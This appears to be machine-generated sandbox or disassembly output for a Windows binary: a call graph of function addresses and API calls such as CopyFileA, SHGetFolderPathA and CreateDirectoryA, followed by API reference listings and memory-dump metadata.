9066b5 45637->45643 45711 844400 4 API calls 2 library calls 45637->45711 45639->45635 45639->45636 45644 906762 45639->45644 45706 8442a0 45639->45706 45642 8442a0 3 API calls 45640->45642 45640->45643 45642->45643 45643->45560 45645 858c70 std::_Throw_Cpp_error 3 API calls 45644->45645 45645->45636 45651 8f6bde 45646->45651 45655 8f6d13 45646->45655 45647 8f6d1f CopyFileA 45648 8f6d73 45647->45648 45649 8f6d33 GetLastError 45647->45649 45648->45562 45650 8f6d3a 45649->45650 45650->45562 45653 8f6cf4 45651->45653 45717 835eb0 GetLastError GetLastError GetLastError 45651->45717 45719 8388d0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45653->45719 45655->45647 45657 8f6c70 45718 8388d0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 45657->45718 45720 91bf00 45658->45720 45661 91ad1c 45662 91adeb 45661->45662 45663 91adb2 45661->45663 45664 91adc9 45661->45664 45678 91adbf 45661->45678 45681 91aefe 45661->45681 45729 96a8c0 45662->45729 45666 969d90 GetLastError 45663->45666 45664->45662 45668 91addb 45664->45668 45666->45678 45671 969d90 GetLastError 45668->45671 45669 91aeb6 45673 9675d0 GetLastError 45669->45673 45670 91af19 45732 91b370 45670->45732 45671->45678 45673->45678 45674 91af31 45675 91b370 GetLastError 45674->45675 45676 91af4b 45675->45676 45677 91b370 GetLastError 45676->45677 45679 91af65 45677->45679 45678->45681 45767 96b110 45678->45767 45680 91b370 GetLastError 45679->45680 45682 91af7f 45680->45682 45681->45557 45682->45678 45683 91b370 GetLastError 45682->45683 45684 91b039 45683->45684 45743 91b5d0 45684->45743 45687 91b065 45688 9675d0 GetLastError 45687->45688 45688->45678 45689 91b083 45689->45678 45747 9675d0 45689->45747 45693 91b2c1 45693->45678 45695 9675d0 GetLastError 45693->45695 45694 91b0fb 45696 91b166 45694->45696 45698 91b710 GetLastError 45694->45698 45701 91b179 45694->45701 45697 91b2fd 45695->45697 45700 9675d0 GetLastError 45696->45700 45696->45701 45762 91bbd0 45697->45762 45698->45696 45700->45701 45701->45693 45702 9675d0 GetLastError 45701->45702 45702->45701 45703->45557 45704->45568 45705->45572 45707 8443e9 45706->45707 45708 8442fa 45706->45708 45712 847830 45708->45712 45710 8443b0 45710->45639 45711->45643 45713 847882 std::_Throw_Cpp_error 45712->45713 45714 84783d 45712->45714 45713->45710 45714->45713 45715 858c70 std::_Throw_Cpp_error 3 API calls 45714->45715 45716 8478b6 45715->45716 45716->45710 45717->45657 45718->45653 45719->45655 45721 91bf13 45720->45721 45722 91bf1c 45720->45722 45721->45661 45723 91bf00 GetLastError 45722->45723 45728 91c269 45722->45728 45724 91c241 45723->45724 45725 969d90 GetLastError 45724->45725 45724->45728 45726 91c261 45725->45726 45727 91bf00 GetLastError 45726->45727 45727->45728 45728->45661 45730 91bf00 GetLastError 45729->45730 45731 91aeb0 45730->45731 45731->45669 45731->45670 45734 91b386 45732->45734 45733 91b3b7 45733->45674 45734->45733 45737 91b444 45734->45737 45738 91b428 45734->45738 45736 91b4ad 45740 9675d0 GetLastError 45736->45740 45804 93bfa0 GetLastError 45737->45804 45739 9675d0 GetLastError 45738->45739 45741 91b435 45739->45741 45742 91b4e3 45740->45742 45741->45674 45742->45674 45744 91b5fc 45743->45744 45805 95d420 45744->45805 45746 91b05e 45746->45687 45746->45689 45748 9675db 45747->45748 45752 91b0e1 45747->45752 45748->45752 45865 9683e0 GetLastError 45748->45865 45750 967610 45750->45752 45866 957690 GetLastError 45750->45866 45753 91b710 45752->45753 45754 91b80a 45753->45754 45755 91b726 45753->45755 45754->45694 45755->45754 45756 91b710 GetLastError 45755->45756 45758 91b764 45755->45758 45757 91b786 45756->45757 45757->45754 45759 91b710 GetLastError 45757->45759 45758->45754 45760 9675d0 GetLastError 45758->45760 45759->45758 45761 91b7fb 45760->45761 45761->45694 45763 91bbf1 45762->45763 45764 91bbe5 45762->45764 45765 969d90 GetLastError 45763->45765 45766 91bc05 45763->45766 45764->45678 45765->45766 45766->45678 45770 96b123 45767->45770 45801 96b49d 45767->45801 45768 96b13b 45768->45681 45770->45768 45867 940f90 45770->45867 45773 96b176 45776 9675d0 GetLastError 45773->45776 45774 96b1a4 45883 91ba10 45774->45883 45778 96b1b9 45776->45778 45778->45681 45779 96b225 45780 940f90 GetLastError 45779->45780 45785 96b22e 45780->45785 45781 96b1e3 45781->45779 45887 95d320 GetLastError 45781->45887 45783 96b318 45784 966470 GetLastError 45783->45784 45790 96b323 45784->45790 45786 969d90 GetLastError 45785->45786 45787 96b2a5 45785->45787 45786->45785 45787->45783 45791 969d90 GetLastError 45787->45791 45788 96b377 45789 966470 GetLastError 45788->45789 45792 96b382 45789->45792 45790->45788 45794 969d90 GetLastError 45790->45794 45791->45787 45793 9675d0 GetLastError 45792->45793 45795 96b38c 45793->45795 45794->45790 45796 96b3b7 45795->45796 45888 957f80 GetLastError 45795->45888 45799 969d90 GetLastError 45796->45799 45802 96b3f7 45796->45802 45798 96b3a0 45798->45796 45800 969d90 GetLastError 45798->45800 45799->45802 45800->45796 45801->45681 45802->45801 45803 861c96 GetLastError 45802->45803 45803->45801 45804->45736 45808 95d443 45805->45808 45806 95d5e0 45806->45746 45807 95d5b7 45809 969d90 GetLastError 45807->45809 45808->45806 45808->45807 45819 95fcf0 45808->45819 45810 95d5c4 45809->45810 45812 969d90 GetLastError 45810->45812 45813 95d5cd 45812->45813 45813->45746 45814 95d581 45814->45807 45818 95d58a 45814->45818 45840 960490 45814->45840 45816 95d4a3 45816->45814 45836 9606f0 45816->45836 45818->45746 45825 95fd24 45819->45825 45820 95fdb4 45821 95fde2 45820->45821 45822 96001c 45820->45822 45832 969d90 GetLastError 45821->45832 45834 95fe7b 45821->45834 45823 969d90 GetLastError 45822->45823 45824 960022 45823->45824 45824->45816 45825->45820 45825->45824 45826 95fd9d 45825->45826 45827 969d90 GetLastError 45826->45827 45829 95fda8 45827->45829 45828 95ff1b 45831 969d90 GetLastError 45828->45831 45835 95ff28 45828->45835 45829->45816 45830 9606f0 GetLastError 45830->45828 45833 960010 45831->45833 45832->45834 45833->45816 45834->45828 45834->45830 45835->45816 45837 960709 45836->45837 45839 96073f 45836->45839 45837->45839 45850 963850 45837->45850 45839->45814 45841 96049c 45840->45841 45854 9616b0 45841->45854 45843 963850 GetLastError 45844 960516 45843->45844 45846 96052b 45844->45846 45858 962da0 45844->45858 45845 9604e7 45845->45843 45847 969d90 GetLastError 45846->45847 45848 960534 45847->45848 45848->45807 45852 96385c 45850->45852 45851 96387f 45851->45839 45852->45851 45853 969d90 GetLastError 45852->45853 45853->45851 45855 9616d8 45854->45855 45856 9616c0 45854->45856 45855->45845 45856->45855 45864 95e9b0 GetLastError 45856->45864 45859 962dac 45858->45859 45860 969d90 GetLastError 45859->45860 45861 962df5 45860->45861 45862 969d90 GetLastError 45861->45862 45863 962dfb 45862->45863 45863->45846 45864->45855 45865->45750 45866->45752 45868 940fec 45867->45868 45871 940fb4 45867->45871 45890 926760 45868->45890 45871->45868 45876 941122 45871->45876 45889 93bb10 GetLastError 45871->45889 45872 941008 45873 969d90 GetLastError 45872->45873 45874 9410c1 45872->45874 45873->45872 45875 969d90 GetLastError 45874->45875 45874->45876 45875->45876 45877 9255d0 45876->45877 45880 9256a0 45877->45880 45881 9255ec 45877->45881 45878 925685 45879 969d90 GetLastError 45878->45879 45878->45880 45879->45880 45880->45773 45880->45774 45881->45878 45882 969d90 GetLastError 45881->45882 45882->45881 45884 91ba62 45883->45884 45885 91ba1d 45883->45885 45884->45781 45885->45884 45886 969d90 GetLastError 45885->45886 45886->45885 45887->45781 45888->45798 45889->45871 45891 926775 45890->45891 45892 9267e6 45890->45892 45891->45892 45893 969d90 GetLastError 45891->45893 45892->45872 45893->45891 45896 93143d 45894->45896 45895 931442 45897 969d90 GetLastError 45895->45897 45898 9319d7 45895->45898 45896->45895 45899 926760 GetLastError 45896->45899 45897->45898 45903 9675d0 GetLastError 45898->45903 45906 930f8d 45898->45906 45900 9314d2 45899->45900 45901 93162f 45900->45901 45904 9314f3 45900->45904 45936 91c410 45901->45936 45903->45906 45905 9314f8 45904->45905 45911 931531 45904->45911 45907 9675d0 GetLastError 45905->45907 45906->45579 45906->45583 45906->45599 45932 954460 GetLastError 45906->45932 45908 931505 45907->45908 45908->45895 45910 9675d0 GetLastError 45908->45910 45909 931535 45913 931751 45909->45913 45971 95cde0 45909->45971 45980 95ea90 GetLastError 45909->45980 45981 95ccf0 GetLastError 45909->45981 45910->45895 45911->45909 45914 91c410 GetLastError 45911->45914 45912 940f90 GetLastError 45928 931763 45912->45928 45913->45912 45913->45928 45917 9315bb 45914->45917 45916 931896 45918 931950 45916->45918 45919 9318a8 45916->45919 45917->45909 45926 969d90 GetLastError 45917->45926 45921 9675d0 GetLastError 45918->45921 45925 9675d0 GetLastError 45919->45925 45920 93188e 45983 9540c0 GetLastError 45920->45983 45931 9318b5 45921->45931 45925->45931 45926->45909 45928->45916 45928->45920 45982 954460 GetLastError 45928->45982 45930 969d90 GetLastError 45930->45931 45931->45895 45931->45930 45984 956250 GetLastError 45931->45984 45932->45583 45933->45585 45934->45588 45935->45588 45944 91c446 45936->45944 45937 91c832 45937->45909 45938 91c625 45939 91c64e 45938->45939 46001 91f530 GetLastError 45938->46001 45940 969d90 GetLastError 45939->45940 45955 91c654 45940->45955 45941 91c509 45941->45938 45943 91c602 45941->45943 45945 91cf80 GetLastError 45941->45945 45946 91cf80 GetLastError 45943->45946 45944->45937 45944->45941 45947 91c55f 45944->45947 45949 91c4fe 45944->45949 45985 91cf80 45944->45985 45945->45943 45946->45938 45951 969d90 GetLastError 45947->45951 45952 91c578 45947->45952 45999 967510 GetLastError 45949->45999 45950 91c6db 45956 969d90 GetLastError 45950->45956 45959 91c6fc 45950->45959 45951->45952 46000 968370 GetLastError 45952->46000 45954 91c6a8 45954->45950 46003 9540c0 GetLastError 45954->46003 45955->45954 46002 9696d0 GetLastError 45955->46002 45956->45959 45961 91c72f 45959->45961 46004 940b90 GetLastError 45959->46004 45963 969d90 GetLastError 45961->45963 45964 91c749 45961->45964 45963->45964 45965 969d90 GetLastError 45964->45965 45967 91c782 45964->45967 45965->45967 45966 91c7f1 45968 91c818 45966->45968 46005 940b90 GetLastError 45966->46005 45967->45966 45969 969d90 GetLastError 45967->45969 45968->45909 45969->45967 45972 95ceed 45971->45972 45976 95ce01 45971->45976 45979 95ce17 45972->45979 46079 95e880 GetLastError 45972->46079 45976->45972 45976->45979 46061 95cfe0 45976->46061 46076 95f0a0 GetLastError 45976->46076 46077 95cf30 GetLastError 45976->46077 46078 95d660 GetLastError 45976->46078 45979->45909 45980->45909 45981->45909 45982->45920 45983->45916 45984->45931 45986 91cf93 45985->45986 45987 91cffd 45986->45987 45991 91d040 45986->45991 45995 91cff6 45986->45995 46006 91d130 45986->46006 46022 967510 GetLastError 45987->46022 45990 91d01f 46023 91f530 GetLastError 45990->46023 45994 91d079 45991->45994 45991->45995 46024 91f530 GetLastError 45991->46024 46025 967510 GetLastError 45994->46025 45995->45944 45996 91d036 45996->45944 45998 91d084 45998->45944 45999->45941 46000->45941 46001->45938 46002->45954 46003->45950 46004->45961 46005->45966 46007 91d182 46006->46007 46008 91d190 46006->46008 46007->46008 46011 91d1d2 46007->46011 46021 91d1de 46007->46021 46009 91eef2 46008->46009 46010 91ef3c 46008->46010 46012 91eef6 46009->46012 46043 91f340 GetLastError 46009->46043 46013 91ef61 46010->46013 46044 91f530 GetLastError 46010->46044 46026 9415e0 46011->46026 46012->45986 46013->45986 46017 91d360 46017->46008 46019 956b60 GetLastError 46017->46019 46018 91ef32 46018->45986 46019->46008 46021->46008 46021->46017 46039 956b60 46021->46039 46022->45990 46023->45996 46024->45991 46025->45998 46027 9415fe 46026->46027 46029 94194e 46026->46029 46027->46029 46045 956a80 GetLastError 46027->46045 46029->46008 46030 94188c 46031 956b60 GetLastError 46030->46031 46032 9418af 46030->46032 46031->46032 46032->46029 46047 955910 GetLastError 46032->46047 46034 956b60 GetLastError 46036 94179a 46034->46036 46035 941639 46035->46032 46035->46036 46037 956b60 GetLastError 46035->46037 46036->46030 46036->46034 46046 9563f0 GetLastError 46036->46046 46037->46035 46040 956b6c 46039->46040 46048 969960 46040->46048 46042 956b84 46042->46021 46043->46018 46044->46010 46045->46035 46046->46036 46047->46029 46049 969975 46048->46049 46057 9699fb 46048->46057 46050 969a5e 46049->46050 46054 969979 46049->46054 46056 9699ed 46049->46056 46051 91bf00 GetLastError 46050->46051 46052 969a63 46051->46052 46053 969a67 46052->46053 46060 969bf0 GetLastError 46052->46060 46053->46042 46054->46042 46056->46057 46058 969d90 GetLastError 46056->46058 46057->46042 46059 969a54 46058->46059 46059->46042 46060->46057 46080 95f550 46061->46080 46063 95cff5 46065 95d14f 46063->46065 46084 95f2e0 46063->46084 46065->45976 46066 95d147 46066->46065 46095 95f4f0 GetLastError 46066->46095 46068 95d00f 46068->46065 46068->46066 46071 95d0f7 46068->46071 46069 95d113 46070 963850 GetLastError 46069->46070 46072 95d129 46070->46072 46071->46069 46094 95f4f0 GetLastError 46071->46094 46074 9606f0 GetLastError 46072->46074 46075 95d13d 46074->46075 46075->45976 46076->45976 46077->45976 46078->45976 46079->45979 46082 95f56a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 46080->46082 46083 95f5e9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 46082->46083 46096 960af0 GetLastError __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 46082->46096 46083->46063 46085 95f2f8 46084->46085 46087 95f302 46084->46087 46085->46068 46086 9616b0 GetLastError 46093 95f33a 46086->46093 46088 95f30e 46087->46088 46090 95f464 46087->46090 46087->46093 46088->46086 46088->46093 46089 95f482 46098 9617c0 GetLastError 46089->46098 46090->46089 46090->46093 46097 9644a0 GetLastError 46090->46097 46093->46068 46094->46069 46095->46065 46096->46083 46097->46089 46098->46093 46100 85d276 46099->46100 46101 85d26c 46099->46101 46114 85d1a7 46100->46114 46102 86b9d0 GetLastError 46101->46102 46104 85d273 46102->46104 46104->45614 46105 85d290 46117 85d18a 46105->46117 46109 85d2a4 46110 85d2c2 46109->46110 46111 86b01a ___free_lconv_mon GetLastError 46109->46111 46110->45614 46111->46110 46112->45606 46113->45611 46125 8595ae 46114->46125 46116 85d1b9 46116->46105 46132 85d0d8 46117->46132 46119 85d1a2 46119->46109 46120 86b9d0 46119->46120 46121 86b9de 46120->46121 46122 86b9f4 46121->46122 46123 86b9e2 GetLastError 46121->46123 46122->46109 46124 86b9ee __dosmaperr 46123->46124 46124->46109 46126 8595c5 46125->46126 46127 8595cc 46125->46127 46126->46116 46127->46126 46128 86a12d __Getcoll GetLastError 46127->46128 46129 859603 46128->46129 46131 86a18b GetLastError GetLastError GetLastError __fread_nolock 46129->46131 46131->46126 46133 85d0e6 46132->46133 46134 85d100 46132->46134 46143 85d1e6 GetLastError ___free_lconv_mon 46133->46143 46136 85d107 46134->46136 46138 85d126 __fread_nolock 46134->46138 46140 85d0f0 __dosmaperr 46136->46140 46144 85d200 GetLastError 46136->46144 46139 85d13c GetLastError 46138->46139 46141 85d162 __fread_nolock 46138->46141 46145 85d200 GetLastError 46138->46145 46139->46140 46140->46119 46141->46139 46141->46140 46143->46140 46144->46140 46145->46141 46147 8593be __fread_nolock 46146->46147 46153 858cc1 46147->46153 46149 8593ca 46149->45622 46210 8620bc 46150->46210 46154 858ccd __fread_nolock 46153->46154 46155 858cd4 46154->46155 46157 858cf5 __fread_nolock 46154->46157 46165 858be3 GetLastError GetLastError GetLastError __fread_nolock __Getcoll 46155->46165 46162 858dd0 46157->46162 46158 858ced 46158->46149 46167 858e02 46162->46167 46164 858d0f 46166 858d37 GetLastError GetLastError GetLastError __fread_nolock 46164->46166 46165->46158 46166->46158 46168 858e11 46167->46168 46169 858e39 46167->46169 46188 858be3 GetLastError GetLastError GetLastError __fread_nolock __Getcoll 46168->46188 46180 86a1e9 46169->46180 46172 858e42 46185 8625df 46172->46185 46175 858eec 46189 85916e 4 API calls 2 library calls 46175->46189 46177 858f03 46179 858e2c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 46177->46179 46190 858fa3 4 API calls 2 library calls 46177->46190 46179->46164 46181 86a1f5 __dosmaperr 46180->46181 46182 86a20a 46180->46182 46191 858c60 GetLastError GetLastError GetLastError __fread_nolock 46181->46191 46182->46172 46184 86a205 46184->46172 46192 8623f7 46185->46192 46187 858e60 46187->46175 46187->46177 46187->46179 46188->46179 46189->46179 46190->46179 46191->46184 46194 862403 __fread_nolock 46192->46194 46193 86240b 46193->46187 46194->46193 46195 862446 46194->46195 46197 86248c 46194->46197 46204 858be3 GetLastError GetLastError GetLastError __fread_nolock __Getcoll 46195->46204 46197->46193 46199 86251c 46197->46199 46205 86e940 46199->46205 46201 86252e 46202 862562 GetLastError 46201->46202 46203 862536 __fread_nolock 46201->46203 46202->46203 46203->46193 46204->46193 46206 86e962 __dosmaperr 46205->46206 46207 86e94d __dosmaperr 46205->46207 46208 86e987 46206->46208 46209 858c60 __fread_nolock GetLastError GetLastError GetLastError 46206->46209 46207->46201 46208->46201 46209->46207 46212 8620c8 __fread_nolock 46210->46212 46211 8620b7 46211->45619 46212->46211 46213 862112 __fread_nolock 46212->46213 46215 8620db __dosmaperr 46212->46215 46219 861ec6 46213->46219 46227 858c60 GetLastError GetLastError GetLastError __fread_nolock 46215->46227 46221 861ef5 46219->46221 46223 861ed8 __fread_nolock 46219->46223 46228 862151 GetLastError GetLastError GetLastError __fread_nolock 46221->46228 46222 861ee5 __dosmaperr 46255 858c60 GetLastError GetLastError GetLastError __fread_nolock 46222->46255 46223->46221 46223->46222 46225 86a1e9 __fread_nolock 3 API calls 46223->46225 46229 868910 46223->46229 46256 85ceeb GetLastError GetLastError GetLastError __fread_nolock __dosmaperr 46223->46256 46225->46223 46227->46211 46228->46211 46230 86893a 46229->46230 46231 868922 __dosmaperr 46229->46231 46230->46231 46232 868988 __dosmaperr 46230->46232 46233 8689b8 46230->46233 46231->46223 46262 858c60 GetLastError GetLastError GetLastError __fread_nolock 46232->46262 46235 8689d1 46233->46235 46237 868a0c __fread_nolock 46233->46237 46238 8689de __dosmaperr 46233->46238 46236 8689fa 46235->46236 46235->46238 46259 873be3 GetLastError GetLastError GetLastError __fread_nolock __dosmaperr 46236->46259 46240 86b01a ___free_lconv_mon GetLastError 46237->46240 46257 858c60 GetLastError GetLastError GetLastError __fread_nolock 46238->46257 46241 868a26 46240->46241 46243 86b01a ___free_lconv_mon GetLastError 46241->46243 46244 868a2d 46243->46244 46254 8689f5 __fread_nolock __dosmaperr 46244->46254 46258 8625fd GetLastError GetLastError GetLastError GetLastError __fread_nolock 46244->46258 46246 86b01a ___free_lconv_mon GetLastError 46246->46231 46247 868b58 __fread_nolock 46248 868ba2 GetLastError 46247->46248 46249 868bc1 46247->46249 46248->46254 46250 868c24 46249->46250 46251 868c0d 46249->46251 46249->46254 46250->46254 46261 868468 GetLastError GetLastError GetLastError GetLastError __fread_nolock 46250->46261 46260 868622 5 API calls 2 library calls 46251->46260 46254->46246 46255->46221 46256->46223 46257->46254 46258->46236 46259->46247 46260->46254 46261->46254 46262->46231 46263 8a1c10 46264 906ca0 4 API calls 46263->46264 46296 8a1c6c std::_Throw_Cpp_error 46264->46296 46265 8a443c 46266 8a4489 std::_Throw_Cpp_error 46335 827b10 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 46266->46335 46268 8a44c8 std::_Throw_Cpp_error 46271 858c70 std::_Throw_Cpp_error 3 API calls 46268->46271 46269 8a4584 std::_Throw_Cpp_error 46338 827b10 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 46269->46338 46277 8a44e1 Concurrency::cancel_current_task std::_Throw_Cpp_error 46271->46277 46272 8a445e std::_Throw_Cpp_error 46334 827b10 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 46272->46334 46273 8a45c3 std::_Throw_Cpp_error 46274 83b0e0 GetLastError GetLastError GetLastError 46274->46296 46276 83af80 GetLastError GetLastError GetLastError 46276->46296 46278 83ace0 3 API calls 46277->46278 46279 8a4518 46278->46279 46336 827cf0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 46279->46336 46282 8a4530 std::_Throw_Cpp_error 46284 83ace0 3 API calls 46282->46284 46285 8a456c 46284->46285 46337 827cf0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 46285->46337 46287 9064d0 GetLastError GetLastError GetLastError GetLastError 46287->46296 46288 8a2793 SHGetFolderPathA 46288->46296 46289 8a2a95 SHGetFolderPathA 46289->46296 46290 8a2d93 SHGetFolderPathA 46290->46296 46291 8a30f3 SHGetFolderPathA 46291->46296 46292 8a341b SHGetFolderPathA 46292->46296 46293 838b00 GetLastError GetLastError GetLastError 46293->46296 46294 8a3725 SHGetFolderPathA 46294->46296 46296->46265 46296->46266 46296->46268 46296->46269 46296->46272 46296->46274 46296->46276 46296->46277 46296->46282 46296->46287 46296->46288 46296->46289 46296->46290 46296->46291 46296->46292 46296->46293 46296->46294 46297 8385d0 GetLastError GetLastError GetLastError 46296->46297 46298 822fe0 GetLastError GetLastError GetLastError 46296->46298 46299 8612b7 GetLastError GetLastError GetLastError __fread_nolock 46296->46299 46300 8a45e0 46296->46300 46333 836130 GetLastError GetLastError GetLastError 46296->46333 46297->46296 46298->46296 46299->46296 46301 8a4641 46300->46301 46302 906ca0 4 API calls 46301->46302 46303 8a5dda Concurrency::cancel_current_task 46301->46303 46313 8a4651 46302->46313 46304 858c70 std::_Throw_Cpp_error 3 API calls 46303->46304 46305 8a5dee 46304->46305 46306 8a5c67 46308 8385d0 3 API calls 46306->46308 46307 8a4a26 46309 8385d0 3 API calls 46307->46309 46310 8a5c79 std::_Throw_Cpp_error 46308->46310 46331 8a4a38 std::_Throw_Cpp_error 46309->46331 46311 906770 4 API calls 46310->46311 46314 8a5cd7 46310->46314 46311->46314 46312 835350 3 API calls 46312->46313 46313->46307 46313->46310 46313->46312 46324 8a474a 46313->46324 46313->46331 46358 8a5fa0 GetLastError GetLastError GetLastError 46313->46358 46316 8385d0 3 API calls 46314->46316 46318 8a5d40 46316->46318 46319 8385d0 3 API calls 46318->46319 46320 8a5d4f 46319->46320 46320->46296 46321 8a4870 CreateDirectoryA 46321->46324 46322 835350 GetLastError GetLastError GetLastError 46322->46324 46324->46321 46324->46322 46326 8a45e0 6 API calls 46324->46326 46326->46313 46327 8a5032 CreateDirectoryA 46327->46331 46328 838b00 GetLastError GetLastError GetLastError 46328->46331 46331->46303 46331->46306 46331->46310 46331->46327 46331->46328 46332 907220 GetLastError GetLastError GetLastError GetLastError 46331->46332 46339 8a5fa0 GetLastError GetLastError GetLastError 46331->46339 46340 835350 46331->46340 46349 8a5df0 46331->46349 46359 8f3320 GetLastError GetLastError GetLastError 46331->46359 46360 8388d0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 46331->46360 46332->46331 46333->46296 46334->46266 46335->46268 46336->46282 46337->46269 46338->46273 46339->46331 46341 8353a0 Concurrency::cancel_current_task std::_Throw_Cpp_error 46340->46341 46342 8353d7 std::_Throw_Cpp_error 46340->46342 46341->46342 46343 858c70 std::_Throw_Cpp_error 3 API calls 46341->46343 46342->46331 46344 835478 46343->46344 46361 839c20 46344->46361 46347 83556c 46347->46331 46348 8354d5 46368 824900 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 46348->46368 46350 8a5f5f 46349->46350 46357 8a5e30 std::_Throw_Cpp_error 46349->46357 46351 8385d0 3 API calls 46350->46351 46353 8a5f6d 46351->46353 46353->46331 46357->46350 46371 852729 GetLastError 6 library calls 46357->46371 46372 83d260 3 API calls 4 library calls 46357->46372 46373 83c160 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 46357->46373 46374 8423e0 46357->46374 46358->46313 46359->46331 46360->46331 46362 839c76 46361->46362 46363 839c4a 46361->46363 46365 839c82 46362->46365 46370 8350e0 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 46362->46370 46369 824900 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 46363->46369 46365->46348 46366 839c63 46366->46348 46368->46347 46369->46366 46370->46365 46371->46357 46372->46357 46373->46357 46375 84240c 46374->46375 46376 84241f 46374->46376 46375->46357 46386 83fb40 46376->46386 46378 842537 46392 847a40 GetLastError GetLastError GetLastError 46378->46392 46380 842559 46382 84256d std::_Throw_Cpp_error 46380->46382 46393 83e650 GetLastError GetLastError GetLastError std::_Throw_Cpp_error 46380->46393 46383 858c70 std::_Throw_Cpp_error 3 API calls 46382->46383 46384 84279b std::_Throw_Cpp_error 46382->46384 46385 8427db 46383->46385 46384->46357 46387 83fb5b 46386->46387 46388 83fb68 46386->46388 46387->46378 46390 83fb86 46388->46390 46394 849c70 46388->46394 46390->46378 46391 83fb7f 46391->46378 46392->46380 46393->46382 46399 849ca2 Concurrency::cancel_current_task std::_Throw_Cpp_error 46394->46399 46395 858c70 std::_Throw_Cpp_error 3 API calls 46396 849dce 46395->46396 46401 839950 46396->46401 46398 849dd9 std::_Throw_Cpp_error 46399->46395 46400 849d8f std::_Throw_Cpp_error 46399->46400 46400->46391 46402 839978 std::_Throw_Cpp_error 46401->46402 46403 839968 46401->46403 46402->46398 46403->46402 46404 858c70 std::_Throw_Cpp_error 3 API calls 46403->46404 46405 83998d 46404->46405 46406 839a4f 46405->46406 46411 852b74 46405->46411 46406->46398 46408 8399cc 46408->46406 46415 8383b0 GetLastError GetLastError GetLastError 46408->46415 46410 8399dd 46410->46398 46412 852af7 46411->46412 46414 852b43 46412->46414 46416 859815 46412->46416 46414->46408 46415->46410 46417 85975e __fread_nolock __dosmaperr 46416->46417 46419 859781 __dosmaperr 46417->46419 46420 858c60 GetLastError GetLastError GetLastError __fread_nolock 46417->46420 46419->46414 46420->46419
                                  APIs
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082BA08
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082BAD2
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082C575
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082D29A
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082D6F8
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082DAD7
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082DF3C
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082E6FA
                                  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0082EEEA
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082F45B
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082F525
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082FC55
                                  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 008301ED
                                  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00830580
                                  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0083088D
                                  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 00830B14
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00830F12
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00831904
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00831E6E
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00831FBE
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082FEF1
                                    • Part of subcall function 00906770: GetLastError.KERNEL32(00000000,?,00000080,?,?,009A94F8,?,?,?,00985B0C,00000001,?,009A94F8,?,?), ref: 00906B20
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082F933
                                    • Part of subcall function 00906770: std::_Throw_Cpp_error.LIBCPMT ref: 00906BE7
                                    • Part of subcall function 00906770: std::_Throw_Cpp_error.LIBCPMT ref: 00906BF8
                                    • Part of subcall function 00906CA0: std::_Throw_Cpp_error.LIBCPMT ref: 00906D4F
                                    • Part of subcall function 00906CA0: std::_Throw_Cpp_error.LIBCPMT ref: 00906D60
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0082BB07
                                    • Part of subcall function 00906CA0: GetLastError.KERNEL32(?,?,?,00000006,00000005,00000005), ref: 00906D07
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082BD08
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0082BD37
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082C0CC
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0082C196
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2257253231.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000000.00000002.2257233006.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257375774.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257400311.00000000009A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257416652.00000000009AA000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257497150.0000000000AD3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257511767.0000000000AD4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2257697982.0000000000DD5000.00000002.00000001.01000000.00000003.sdmpDownload File
